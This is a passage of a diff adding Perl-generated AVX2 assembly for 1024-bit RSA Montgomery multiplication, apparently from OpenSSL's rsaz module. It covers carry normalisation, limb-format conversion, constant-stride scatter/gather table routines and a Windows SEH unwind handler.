+	vpmuludq	$Bi,$TEMP2,$TEMP2
+	vmovdqu		-8+32*7-128($ap),$TEMP1
+	vpaddq		$TEMP2,$ACC5,$ACC5
+	vpmuludq	$Bi,$TEMP0,$TEMP0
+	vmovdqu		-8+32*8-128($ap),$TEMP2
+	vpaddq		$TEMP0,$ACC6,$ACC6
+	vpmuludq	$Bi,$TEMP1,$TEMP1
+	vmovdqu		-8+32*9-128($ap),$ACC9
+	vpaddq		$TEMP1,$ACC7,$ACC7
+	vpmuludq	$Bi,$TEMP2,$TEMP2
+	vpaddq		$TEMP2,$ACC8,$ACC8
+	vpmuludq	$Bi,$ACC9,$ACC9
+	 vpbroadcastq	16($bp), $Bi
+
+	mov	%rax,%rdx
+	imulq	-128($np),%rax
+	add	%rax,$r1
+	 vmovdqu	-8+32*1-128($np),$TEMP0
+	mov	%rdx,%rax
+	imulq	8-128($np),%rax
+	add	%rax,$r2
+	 vmovdqu	-8+32*2-128($np),$TEMP1
+	shr	\$29, $r1
+	imulq	16-128($np),%rdx
+	add	%rdx,$r3
+	add	$r1, $r2
+
+	vpmuludq	$Yi,$TEMP0,$TEMP0
+	 vmovq		$Bi, %rbx
+	vmovdqu		-8+32*3-128($np),$TEMP2
+	vpaddq		$TEMP0,$ACC1,$ACC1
+	vpmuludq	$Yi,$TEMP1,$TEMP1
+	vmovdqu		-8+32*4-128($np),$TEMP0
+	vpaddq		$TEMP1,$ACC2,$ACC2
+	vpmuludq	$Yi,$TEMP2,$TEMP2
+	vmovdqu		-8+32*5-128($np),$TEMP1
+	vpaddq		$TEMP2,$ACC3,$ACC3
+	vpmuludq	$Yi,$TEMP0,$TEMP0
+	vmovdqu		-8+32*6-128($np),$TEMP2
+	vpaddq		$TEMP0,$ACC4,$ACC4
+	vpmuludq	$Yi,$TEMP1,$TEMP1
+	vmovdqu		-8+32*7-128($np),$TEMP0
+	vpaddq		$TEMP1,$ACC5,$ACC5
+	vpmuludq	$Yi,$TEMP2,$TEMP2
+	vmovdqu		-8+32*8-128($np),$TEMP1
+	vpaddq		$TEMP2,$ACC6,$ACC6
+	vpmuludq	$Yi,$TEMP0,$TEMP0
+	vmovdqu		-8+32*9-128($np),$TEMP2
+	vpaddq		$TEMP0,$ACC7,$ACC7
+	vpmuludq	$Yi,$TEMP1,$TEMP1
+	vpaddq		$TEMP1,$ACC8,$ACC8
+	vpmuludq	$Yi,$TEMP2,$TEMP2
+	vpaddq		$TEMP2,$ACC9,$ACC9
+
+	 vmovdqu	-16+32*1-128($ap),$TEMP0
+	mov	%rbx,%rax
+	imulq	-128($ap),%rax
+	add	$r2,%rax
+
+	 vmovdqu	-16+32*2-128($ap),$TEMP1
+	mov	%rax,$r2
+	imull	$n0, %eax
+	and	\$0x1fffffff, %eax
+
+	 imulq	8-128($ap),%rbx
+	 add	%rbx,$r3
+	vpmuludq	$Bi,$TEMP0,$TEMP0
+	 vmovd		%eax, $Yi
+	vmovdqu		-16+32*3-128($ap),$TEMP2
+	vpaddq		$TEMP0,$ACC1,$ACC1
+	vpmuludq	$Bi,$TEMP1,$TEMP1
+	 vpbroadcastq	$Yi, $Yi
+	vmovdqu		-16+32*4-128($ap),$TEMP0
+	vpaddq		$TEMP1,$ACC2,$ACC2
+	vpmuludq	$Bi,$TEMP2,$TEMP2
+	vmovdqu		-16+32*5-128($ap),$TEMP1
+	vpaddq		$TEMP2,$ACC3,$ACC3
+	vpmuludq	$Bi,$TEMP0,$TEMP0
+	vmovdqu		-16+32*6-128($ap),$TEMP2
+	vpaddq		$TEMP0,$ACC4,$ACC4
+	vpmuludq	$Bi,$TEMP1,$TEMP1
+	vmovdqu		-16+32*7-128($ap),$TEMP0
+	vpaddq		$TEMP1,$ACC5,$ACC5
+	vpmuludq	$Bi,$TEMP2,$TEMP2
+	vmovdqu		-16+32*8-128($ap),$TEMP1
+	vpaddq		$TEMP2,$ACC6,$ACC6
+	vpmuludq	$Bi,$TEMP0,$TEMP0
+	vmovdqu		-16+32*9-128($ap),$TEMP2
+	vpaddq		$TEMP0,$ACC7,$ACC7
+	vpmuludq	$Bi,$TEMP1,$TEMP1
+	vpaddq		$TEMP1,$ACC8,$ACC8
+	vpmuludq	$Bi,$TEMP2,$TEMP2
+	 vpbroadcastq	24($bp), $Bi
+	vpaddq		$TEMP2,$ACC9,$ACC9
+
+	 vmovdqu	-16+32*1-128($np),$TEMP0
+	mov	%rax,%rdx
+	imulq	-128($np),%rax
+	add	%rax,$r2
+	 vmovdqu	-16+32*2-128($np),$TEMP1
+	imulq	8-128($np),%rdx
+	add	%rdx,$r3
+	shr	\$29, $r2
+
+	vpmuludq	$Yi,$TEMP0,$TEMP0
+	 vmovq		$Bi, %rbx
+	vmovdqu		-16+32*3-128($np),$TEMP2
+	vpaddq		$TEMP0,$ACC1,$ACC1
+	vpmuludq	$Yi,$TEMP1,$TEMP1
+	vmovdqu		-16+32*4-128($np),$TEMP0
+	vpaddq		$TEMP1,$ACC2,$ACC2
+	vpmuludq	$Yi,$TEMP2,$TEMP2
+	vmovdqu		-16+32*5-128($np),$TEMP1
+	vpaddq		$TEMP2,$ACC3,$ACC3
+	vpmuludq	$Yi,$TEMP0,$TEMP0
+	vmovdqu		-16+32*6-128($np),$TEMP2
+	vpaddq		$TEMP0,$ACC4,$ACC4
+	vpmuludq	$Yi,$TEMP1,$TEMP1
+	vmovdqu		-16+32*7-128($np),$TEMP0
+	vpaddq		$TEMP1,$ACC5,$ACC5
+	vpmuludq	$Yi,$TEMP2,$TEMP2
+	vmovdqu		-16+32*8-128($np),$TEMP1
+	vpaddq		$TEMP2,$ACC6,$ACC6
+	vpmuludq	$Yi,$TEMP0,$TEMP0
+	vmovdqu		-16+32*9-128($np),$TEMP2
+	vpaddq		$TEMP0,$ACC7,$ACC7
+	vpmuludq	$Yi,$TEMP1,$TEMP1
+	 vmovdqu	-24+32*1-128($ap),$TEMP0
+	vpaddq		$TEMP1,$ACC8,$ACC8
+	vpmuludq	$Yi,$TEMP2,$TEMP2
+	 vmovdqu	-24+32*2-128($ap),$TEMP1
+	vpaddq		$TEMP2,$ACC9,$ACC9
+
+	add	$r2, $r3
+	imulq	-128($ap),%rbx
+	add	%rbx,$r3
+
+	mov	$r3, %rax
+	imull	$n0, %eax
+	and	\$0x1fffffff, %eax
+
+	vpmuludq	$Bi,$TEMP0,$TEMP0
+	 vmovd		%eax, $Yi
+	vmovdqu		-24+32*3-128($ap),$TEMP2
+	vpaddq		$TEMP0,$ACC1,$ACC1
+	vpmuludq	$Bi,$TEMP1,$TEMP1
+	 vpbroadcastq	$Yi, $Yi
+	vmovdqu		-24+32*4-128($ap),$TEMP0
+	vpaddq		$TEMP1,$ACC2,$ACC2
+	vpmuludq	$Bi,$TEMP2,$TEMP2
+	vmovdqu		-24+32*5-128($ap),$TEMP1
+	vpaddq		$TEMP2,$ACC3,$ACC3
+	vpmuludq	$Bi,$TEMP0,$TEMP0
+	vmovdqu		-24+32*6-128($ap),$TEMP2
+	vpaddq		$TEMP0,$ACC4,$ACC4
+	vpmuludq	$Bi,$TEMP1,$TEMP1
+	vmovdqu		-24+32*7-128($ap),$TEMP0
+	vpaddq		$TEMP1,$ACC5,$ACC5
+	vpmuludq	$Bi,$TEMP2,$TEMP2
+	vmovdqu		-24+32*8-128($ap),$TEMP1
+	vpaddq		$TEMP2,$ACC6,$ACC6
+	vpmuludq	$Bi,$TEMP0,$TEMP0
+	vmovdqu		-24+32*9-128($ap),$TEMP2
+	vpaddq		$TEMP0,$ACC7,$ACC7
+	vpmuludq	$Bi,$TEMP1,$TEMP1
+	vpaddq		$TEMP1,$ACC8,$ACC8
+	vpmuludq	$Bi,$TEMP2,$TEMP2
+	 vpbroadcastq	32($bp), $Bi
+	vpaddq		$TEMP2,$ACC9,$ACC9
+	 add		\$32, $bp			# $bp++
+
+	vmovdqu		-24+32*1-128($np),$TEMP0
+	imulq	-128($np),%rax
+	add	%rax,$r3
+	shr	\$29, $r3
+
+	vmovdqu		-24+32*2-128($np),$TEMP1
+	vpmuludq	$Yi,$TEMP0,$TEMP0
+	 vmovq		$Bi, %rbx
+	vmovdqu		-24+32*3-128($np),$TEMP2
+	vpaddq		$TEMP0,$ACC1,$ACC0		# $ACC0==$TEMP0
+	vpmuludq	$Yi,$TEMP1,$TEMP1
+	 vmovdqu	$ACC0, (%rsp)			# transfer $r0-$r3
+	vpaddq		$TEMP1,$ACC2,$ACC1
+	vmovdqu		-24+32*4-128($np),$TEMP0
+	vpmuludq	$Yi,$TEMP2,$TEMP2
+	vmovdqu		-24+32*5-128($np),$TEMP1
+	vpaddq		$TEMP2,$ACC3,$ACC2
+	vpmuludq	$Yi,$TEMP0,$TEMP0
+	vmovdqu		-24+32*6-128($np),$TEMP2
+	vpaddq		$TEMP0,$ACC4,$ACC3
+	vpmuludq	$Yi,$TEMP1,$TEMP1
+	vmovdqu		-24+32*7-128($np),$TEMP0
+	vpaddq		$TEMP1,$ACC5,$ACC4
+	vpmuludq	$Yi,$TEMP2,$TEMP2
+	vmovdqu		-24+32*8-128($np),$TEMP1
+	vpaddq		$TEMP2,$ACC6,$ACC5
+	vpmuludq	$Yi,$TEMP0,$TEMP0
+	vmovdqu		-24+32*9-128($np),$TEMP2
+	 mov	$r3, $r0
+	vpaddq		$TEMP0,$ACC7,$ACC6
+	vpmuludq	$Yi,$TEMP1,$TEMP1
+	 add	(%rsp), $r0
+	vpaddq		$TEMP1,$ACC8,$ACC7
+	vpmuludq	$Yi,$TEMP2,$TEMP2
+	 vmovq	$r3, $TEMP1
+	vpaddq		$TEMP2,$ACC9,$ACC8
+
+	dec	$i
+	jnz	.Loop_mul_1024
+___
+
+# (*)	Original implementation was correcting ACC1-ACC3 for overflow
+#	after 7 loop runs, or after 28 iterations, or 56 additions.
+#	But as we underutilize resources, it's possible to correct in
+#	each iteration with marginal performance loss. But then, as
+#	we do it in each iteration, we can correct less digits, and
+#	avoid performance penalties completely. Also note that we
+#	correct only three digits out of four. This works because
+#	most significant digit is subjected to less additions.
+
+$TEMP0 = $ACC9;
+$TEMP3 = $Bi;
+$TEMP4 = $Yi;
+$code.=<<___;
+	vpermq		\$0, $AND_MASK, $AND_MASK
+	vpaddq		(%rsp), $TEMP1, $ACC0
+
+	vpsrlq		\$29, $ACC0, $TEMP1
+	vpand		$AND_MASK, $ACC0, $ACC0
+	vpsrlq		\$29, $ACC1, $TEMP2
+	vpand		$AND_MASK, $ACC1, $ACC1
+	vpsrlq		\$29, $ACC2, $TEMP3
+	vpermq		\$0x93, $TEMP1, $TEMP1
+	vpand		$AND_MASK, $ACC2, $ACC2
+	vpsrlq		\$29, $ACC3, $TEMP4
+	vpermq		\$0x93, $TEMP2, $TEMP2
+	vpand		$AND_MASK, $ACC3, $ACC3
+
+	vpblendd	\$3, $ZERO, $TEMP1, $TEMP0
+	vpermq		\$0x93, $TEMP3, $TEMP3
+	vpblendd	\$3, $TEMP1, $TEMP2, $TEMP1
+	vpermq		\$0x93, $TEMP4, $TEMP4
+	vpaddq		$TEMP0, $ACC0, $ACC0
+	vpblendd	\$3, $TEMP2, $TEMP3, $TEMP2
+	vpaddq		$TEMP1, $ACC1, $ACC1
+	vpblendd	\$3, $TEMP3, $TEMP4, $TEMP3
+	vpaddq		$TEMP2, $ACC2, $ACC2
+	vpblendd	\$3, $TEMP4, $ZERO, $TEMP4
+	vpaddq		$TEMP3, $ACC3, $ACC3
+	vpaddq		$TEMP4, $ACC4, $ACC4
+
+	vpsrlq		\$29, $ACC0, $TEMP1
+	vpand		$AND_MASK, $ACC0, $ACC0
+	vpsrlq		\$29, $ACC1, $TEMP2
+	vpand		$AND_MASK, $ACC1, $ACC1
+	vpsrlq		\$29, $ACC2, $TEMP3
+	vpermq		\$0x93, $TEMP1, $TEMP1
+	vpand		$AND_MASK, $ACC2, $ACC2
+	vpsrlq		\$29, $ACC3, $TEMP4
+	vpermq		\$0x93, $TEMP2, $TEMP2
+	vpand		$AND_MASK, $ACC3, $ACC3
+	vpermq		\$0x93, $TEMP3, $TEMP3
+
+	vpblendd	\$3, $ZERO, $TEMP1, $TEMP0
+	vpermq		\$0x93, $TEMP4, $TEMP4
+	vpblendd	\$3, $TEMP1, $TEMP2, $TEMP1
+	vpaddq		$TEMP0, $ACC0, $ACC0
+	vpblendd	\$3, $TEMP2, $TEMP3, $TEMP2
+	vpaddq		$TEMP1, $ACC1, $ACC1
+	vpblendd	\$3, $TEMP3, $TEMP4, $TEMP3
+	vpaddq		$TEMP2, $ACC2, $ACC2
+	vpblendd	\$3, $TEMP4, $ZERO, $TEMP4
+	vpaddq		$TEMP3, $ACC3, $ACC3
+	vpaddq		$TEMP4, $ACC4, $ACC4
+
+	vmovdqu		$ACC0, 0-128($rp)
+	vmovdqu		$ACC1, 32-128($rp)
+	vmovdqu		$ACC2, 64-128($rp)
+	vmovdqu		$ACC3, 96-128($rp)
+___
+
+$TEMP5=$ACC0;
+$code.=<<___;
+	vpsrlq		\$29, $ACC4, $TEMP1
+	vpand		$AND_MASK, $ACC4, $ACC4
+	vpsrlq		\$29, $ACC5, $TEMP2
+	vpand		$AND_MASK, $ACC5, $ACC5
+	vpsrlq		\$29, $ACC6, $TEMP3
+	vpermq		\$0x93, $TEMP1, $TEMP1
+	vpand		$AND_MASK, $ACC6, $ACC6
+	vpsrlq		\$29, $ACC7, $TEMP4
+	vpermq		\$0x93, $TEMP2, $TEMP2
+	vpand		$AND_MASK, $ACC7, $ACC7
+	vpsrlq		\$29, $ACC8, $TEMP5
+	vpermq		\$0x93, $TEMP3, $TEMP3
+	vpand		$AND_MASK, $ACC8, $ACC8
+	vpermq		\$0x93, $TEMP4, $TEMP4
+
+	vpblendd	\$3, $ZERO, $TEMP1, $TEMP0
+	vpermq		\$0x93, $TEMP5, $TEMP5
+	vpblendd	\$3, $TEMP1, $TEMP2, $TEMP1
+	vpaddq		$TEMP0, $ACC4, $ACC4
+	vpblendd	\$3, $TEMP2, $TEMP3, $TEMP2
+	vpaddq		$TEMP1, $ACC5, $ACC5
+	vpblendd	\$3, $TEMP3, $TEMP4, $TEMP3
+	vpaddq		$TEMP2, $ACC6, $ACC6
+	vpblendd	\$3, $TEMP4, $TEMP5, $TEMP4
+	vpaddq		$TEMP3, $ACC7, $ACC7
+	vpaddq		$TEMP4, $ACC8, $ACC8
+
+	vpsrlq		\$29, $ACC4, $TEMP1
+	vpand		$AND_MASK, $ACC4, $ACC4
+	vpsrlq		\$29, $ACC5, $TEMP2
+	vpand		$AND_MASK, $ACC5, $ACC5
+	vpsrlq		\$29, $ACC6, $TEMP3
+	vpermq		\$0x93, $TEMP1, $TEMP1
+	vpand		$AND_MASK, $ACC6, $ACC6
+	vpsrlq		\$29, $ACC7, $TEMP4
+	vpermq		\$0x93, $TEMP2, $TEMP2
+	vpand		$AND_MASK, $ACC7, $ACC7
+	vpsrlq		\$29, $ACC8, $TEMP5
+	vpermq		\$0x93, $TEMP3, $TEMP3
+	vpand		$AND_MASK, $ACC8, $ACC8
+	vpermq		\$0x93, $TEMP4, $TEMP4
+
+	vpblendd	\$3, $ZERO, $TEMP1, $TEMP0
+	vpermq		\$0x93, $TEMP5, $TEMP5
+	vpblendd	\$3, $TEMP1, $TEMP2, $TEMP1
+	vpaddq		$TEMP0, $ACC4, $ACC4
+	vpblendd	\$3, $TEMP2, $TEMP3, $TEMP2
+	vpaddq		$TEMP1, $ACC5, $ACC5
+	vpblendd	\$3, $TEMP3, $TEMP4, $TEMP3
+	vpaddq		$TEMP2, $ACC6, $ACC6
+	vpblendd	\$3, $TEMP4, $TEMP5, $TEMP4
+	vpaddq		$TEMP3, $ACC7, $ACC7
+	vpaddq		$TEMP4, $ACC8, $ACC8
+
+	vmovdqu		$ACC4, 128-128($rp)
+	vmovdqu		$ACC5, 160-128($rp)    
+	vmovdqu		$ACC6, 192-128($rp)
+	vmovdqu		$ACC7, 224-128($rp)
+	vmovdqu		$ACC8, 256-128($rp)
+	vzeroupper
+
+	mov	%rbp, %rax
+___
+$code.=<<___ if ($win64);
+	movaps	-0xd8(%rax),%xmm6
+	movaps	-0xc8(%rax),%xmm7
+	movaps	-0xb8(%rax),%xmm8
+	movaps	-0xa8(%rax),%xmm9
+	movaps	-0x98(%rax),%xmm10
+	movaps	-0x88(%rax),%xmm11
+	movaps	-0x78(%rax),%xmm12
+	movaps	-0x68(%rax),%xmm13
+	movaps	-0x58(%rax),%xmm14
+	movaps	-0x48(%rax),%xmm15
+___
+$code.=<<___;
+	mov	-48(%rax),%r15
+	mov	-40(%rax),%r14
+	mov	-32(%rax),%r13
+	mov	-24(%rax),%r12
+	mov	-16(%rax),%rbp
+	mov	-8(%rax),%rbx
+	lea	(%rax),%rsp		# restore %rsp
+.Lmul_1024_epilogue:
+	ret
+.size	rsaz_1024_mul_avx2,.-rsaz_1024_mul_avx2
+___
+}
+{
+my ($out,$inp) = $win64 ? ("%rcx","%rdx") : ("%rdi","%rsi");
+my @T = map("%r$_",(8..11));
+
+$code.=<<___;
+.globl	rsaz_1024_red2norm_avx2
+.type	rsaz_1024_red2norm_avx2,\@abi-omnipotent
+.align	32
+rsaz_1024_red2norm_avx2:
+	sub	\$-128,$inp	# size optimization
+	xor	%rax,%rax
+___
+
+for ($j=0,$i=0; $i<16; $i++) {
+    my $k=0;
+    while (29*$j<64*($i+1)) {	# load data till boundary
+	$code.="	mov	`8*$j-128`($inp), @T[0]\n";
+	$j++; $k++; push(@T,shift(@T));
+    }
+    $l=$k;
+    while ($k>1) {		# shift loaded data but last value
+	$code.="	shl	\$`29*($j-$k)`,@T[-$k]\n";
+	$k--;
+    }
+    $code.=<<___;		# shift last value
+	mov	@T[-1], @T[0]
+	shl	\$`29*($j-1)`, @T[-1]
+	shr	\$`-29*($j-1)`, @T[0]
+___
+    while ($l) {		# accumulate all values
+	$code.="	add	@T[-$l], %rax\n";
+	$l--;
+    }
+	$code.=<<___;
+	adc	\$0, @T[0]	# consume eventual carry
+	mov	%rax, 8*$i($out)
+	mov	@T[0], %rax
+___
+    push(@T,shift(@T));
+}
+$code.=<<___;
+	ret
+.size	rsaz_1024_red2norm_avx2,.-rsaz_1024_red2norm_avx2
+
+.globl	rsaz_1024_norm2red_avx2
+.type	rsaz_1024_norm2red_avx2,\@abi-omnipotent
+.align	32
+rsaz_1024_norm2red_avx2:
+	sub	\$-128,$out	# size optimization
+	mov	($inp),@T[0]
+	mov	\$0x1fffffff,%eax
+___
+for ($j=0,$i=0; $i<16; $i++) {
+    $code.="	mov	`8*($i+1)`($inp),@T[1]\n"	if ($i<15);
+    $code.="	xor	@T[1],@T[1]\n"			if ($i==15);
+    my $k=1;
+    while (29*($j+1)<64*($i+1)) {
+    	$code.=<<___;
+	mov	@T[0],@T[-$k]
+	shr	\$`29*$j`,@T[-$k]
+	and	%rax,@T[-$k]				# &0x1fffffff
+	mov	@T[-$k],`8*$j-128`($out)
+___
+	$j++; $k++;
+    }
+    $code.=<<___;
+	shrd	\$`29*$j`,@T[1],@T[0]
+	and	%rax,@T[0]
+	mov	@T[0],`8*$j-128`($out)
+___
+    $j++;
+    push(@T,shift(@T));
+}
+$code.=<<___;
+	mov	@T[0],`8*$j-128`($out)			# zero
+	mov	@T[0],`8*($j+1)-128`($out)
+	mov	@T[0],`8*($j+2)-128`($out)
+	mov	@T[0],`8*($j+3)-128`($out)
+	ret
+.size	rsaz_1024_norm2red_avx2,.-rsaz_1024_norm2red_avx2
+___
+}
+{
+my ($out,$inp,$power) = $win64 ? ("%rcx","%rdx","%r8d") : ("%rdi","%rsi","%edx");
+
+$code.=<<___;
+.globl	rsaz_1024_scatter5_avx2
+.type	rsaz_1024_scatter5_avx2,\@abi-omnipotent
+.align	32
+rsaz_1024_scatter5_avx2:
+	vzeroupper
+	vmovdqu	.Lscatter_permd(%rip),%ymm5
+	shl	\$4,$power
+	lea	($out,$power),$out
+	mov	\$9,%eax
+	jmp	.Loop_scatter_1024
+
+.align	32
+.Loop_scatter_1024:
+	vmovdqu		($inp),%ymm0
+	lea		32($inp),$inp
+	vpermd		%ymm0,%ymm5,%ymm0
+	vmovdqu		%xmm0,($out)
+	lea		16*32($out),$out
+	dec	%eax
+	jnz	.Loop_scatter_1024
+
+	vzeroupper
+	ret
+.size	rsaz_1024_scatter5_avx2,.-rsaz_1024_scatter5_avx2
+
+.globl	rsaz_1024_gather5_avx2
+.type	rsaz_1024_gather5_avx2,\@abi-omnipotent
+.align	32
+rsaz_1024_gather5_avx2:
+___
+$code.=<<___ if ($win64);
+	lea	-0x88(%rsp),%rax
+	vzeroupper
+.LSEH_begin_rsaz_1024_gather5:
+	# I can't trust assembler to use specific encoding:-(
+	.byte	0x48,0x8d,0x60,0xe0		#lea	-0x20(%rax),%rsp
+	.byte	0xc5,0xf8,0x29,0x70,0xe0	#vmovaps %xmm6,-0x20(%rax)
+	.byte	0xc5,0xf8,0x29,0x78,0xf0	#vmovaps %xmm7,-0x10(%rax)
+	.byte	0xc5,0x78,0x29,0x40,0x00	#vmovaps %xmm8,0(%rax)
+	.byte	0xc5,0x78,0x29,0x48,0x10	#vmovaps %xmm9,0x10(%rax)
+	.byte	0xc5,0x78,0x29,0x50,0x20	#vmovaps %xmm10,0x20(%rax)
+	.byte	0xc5,0x78,0x29,0x58,0x30	#vmovaps %xmm11,0x30(%rax)
+	.byte	0xc5,0x78,0x29,0x60,0x40	#vmovaps %xmm12,0x40(%rax)
+	.byte	0xc5,0x78,0x29,0x68,0x50	#vmovaps %xmm13,0x50(%rax)
+	.byte	0xc5,0x78,0x29,0x70,0x60	#vmovaps %xmm14,0x60(%rax)
+	.byte	0xc5,0x78,0x29,0x78,0x70	#vmovaps %xmm15,0x70(%rax)
+___
+$code.=<<___;
+	lea	.Lgather_table(%rip),%r11
+	mov	$power,%eax
+	and	\$3,$power
+	shr	\$2,%eax			# cache line number
+	shl	\$4,$power			# offset within cache line
+
+	vmovdqu		-32(%r11),%ymm7		# .Lgather_permd
+	vpbroadcastb	8(%r11,%rax), %xmm8
+	vpbroadcastb	7(%r11,%rax), %xmm9
+	vpbroadcastb	6(%r11,%rax), %xmm10
+	vpbroadcastb	5(%r11,%rax), %xmm11
+	vpbroadcastb	4(%r11,%rax), %xmm12
+	vpbroadcastb	3(%r11,%rax), %xmm13
+	vpbroadcastb	2(%r11,%rax), %xmm14
+	vpbroadcastb	1(%r11,%rax), %xmm15
+
+	lea	64($inp,$power),$inp
+	mov	\$64,%r11			# size optimization
+	mov	\$9,%eax
+	jmp	.Loop_gather_1024
+
+.align	32
+.Loop_gather_1024:
+	vpand		-64($inp),		%xmm8,%xmm0
+	vpand		($inp),			%xmm9,%xmm1
+	vpand		64($inp),		%xmm10,%xmm2
+	vpand		($inp,%r11,2),		%xmm11,%xmm3
+	 vpor					%xmm0,%xmm1,%xmm1
+	vpand		64($inp,%r11,2),	%xmm12,%xmm4
+	 vpor					%xmm2,%xmm3,%xmm3
+	vpand		($inp,%r11,4),		%xmm13,%xmm5
+	 vpor					%xmm1,%xmm3,%xmm3
+	vpand		64($inp,%r11,4),	%xmm14,%xmm6
+	 vpor					%xmm4,%xmm5,%xmm5
+	vpand		-128($inp,%r11,8),	%xmm15,%xmm2
+	lea		($inp,%r11,8),$inp
+	 vpor					%xmm3,%xmm5,%xmm5
+	 vpor					%xmm2,%xmm6,%xmm6
+	 vpor					%xmm5,%xmm6,%xmm6
+	vpermd		%ymm6,%ymm7,%ymm6
+	vmovdqu		%ymm6,($out)
+	lea		32($out),$out
+	dec	%eax
+	jnz	.Loop_gather_1024
+
+	vpxor	%ymm0,%ymm0,%ymm0
+	vmovdqu	%ymm0,($out)
+	vzeroupper
+___
+$code.=<<___ if ($win64);
+	movaps	(%rsp),%xmm6
+	movaps	0x10(%rsp),%xmm7
+	movaps	0x20(%rsp),%xmm8
+	movaps	0x30(%rsp),%xmm9
+	movaps	0x40(%rsp),%xmm10
+	movaps	0x50(%rsp),%xmm11
+	movaps	0x60(%rsp),%xmm12
+	movaps	0x70(%rsp),%xmm13
+	movaps	0x80(%rsp),%xmm14
+	movaps	0x90(%rsp),%xmm15
+	lea	0xa8(%rsp),%rsp
+.LSEH_end_rsaz_1024_gather5:
+___
+$code.=<<___;
+	ret
+.size	rsaz_1024_gather5_avx2,.-rsaz_1024_gather5_avx2
+___
+}
+
+$code.=<<___;
+.extern	OPENSSL_ia32cap_P
+.globl	rsaz_avx2_eligible
+.type	rsaz_avx2_eligible,\@abi-omnipotent
+.align	32
+rsaz_avx2_eligible:
+	mov	OPENSSL_ia32cap_P+8(%rip),%eax
+___
+$code.=<<___	if ($addx);
+	mov	\$`1<<8|1<<19`,%ecx
+	mov	\$0,%edx
+	and	%eax,%ecx
+	cmp	\$`1<<8|1<<19`,%ecx	# check for BMI2+AD*X
+	cmove	%edx,%eax
+___
+$code.=<<___;
+	and	\$`1<<5`,%eax
+	shr	\$5,%eax
+	ret
+.size	rsaz_avx2_eligible,.-rsaz_avx2_eligible
+
+.align	64
+.Land_mask:
+	.quad	0x1fffffff,0x1fffffff,0x1fffffff,-1
+.Lscatter_permd:
+	.long	0,2,4,6,7,7,7,7
+.Lgather_permd:
+	.long	0,7,1,7,2,7,3,7
+.Lgather_table:
+	.byte	0,0,0,0,0,0,0,0, 0xff,0,0,0,0,0,0,0
+.align	64
+___
+
+if ($win64) {
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___
+.extern	__imp_RtlVirtualUnwind
+.type	rsaz_se_handler,\@abi-omnipotent
+.align	16
+rsaz_se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# prologue label
+	cmp	%r10,%rbx		# context->Rip<prologue label
+	jb	.Lcommon_seh_tail
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lcommon_seh_tail
+
+	mov	160($context),%rax	# pull context->Rbp
+
+	mov	-48(%rax),%r15
+	mov	-40(%rax),%r14
+	mov	-32(%rax),%r13
+	mov	-24(%rax),%r12
+	mov	-16(%rax),%rbp
+	mov	-8(%rax),%rbx
+	mov	%r15,240($context)
+	mov	%r14,232($context)
+	mov	%r13,224($context)
+	mov	%r12,216($context)
+	mov	%rbp,160($context)
+	mov	%rbx,144($context)
+
+	lea	-0xd8(%rax),%rsi	# %xmm save area
+	lea	512($context),%rdi	# & context.Xmm6
+	mov	\$20,%ecx		# 10*sizeof(%xmm0)/sizeof(%rax)
+	.long	0xa548f3fc		# cld; rep movsq
+
+.Lcommon_seh_tail:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	rsaz_se_handler,.-rsaz_se_handler
+
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_rsaz_1024_sqr_avx2
+	.rva	.LSEH_end_rsaz_1024_sqr_avx2
+	.rva	.LSEH_info_rsaz_1024_sqr_avx2
+
+	.rva	.LSEH_begin_rsaz_1024_mul_avx2
+	.rva	.LSEH_end_rsaz_1024_mul_avx2
+	.rva	.LSEH_info_rsaz_1024_mul_avx2
+
+	.rva	.LSEH_begin_rsaz_1024_gather5
+	.rva	.LSEH_end_rsaz_1024_gather5
+	.rva	.LSEH_info_rsaz_1024_gather5
+.section	.xdata
+.align	8
+.LSEH_info_rsaz_1024_sqr_avx2:
+	.byte	9,0,0,0
+	.rva	rsaz_se_handler
+	.rva	.Lsqr_1024_body,.Lsqr_1024_epilogue
+.LSEH_info_rsaz_1024_mul_avx2:
+	.byte	9,0,0,0
+	.rva	rsaz_se_handler
+	.rva	.Lmul_1024_body,.Lmul_1024_epilogue
+.LSEH_info_rsaz_1024_gather5:
+	.byte	0x01,0x33,0x16,0x00
+	.byte	0x36,0xf8,0x09,0x00	#vmovaps 0x90(rsp),xmm15
+	.byte	0x31,0xe8,0x08,0x00	#vmovaps 0x80(rsp),xmm14
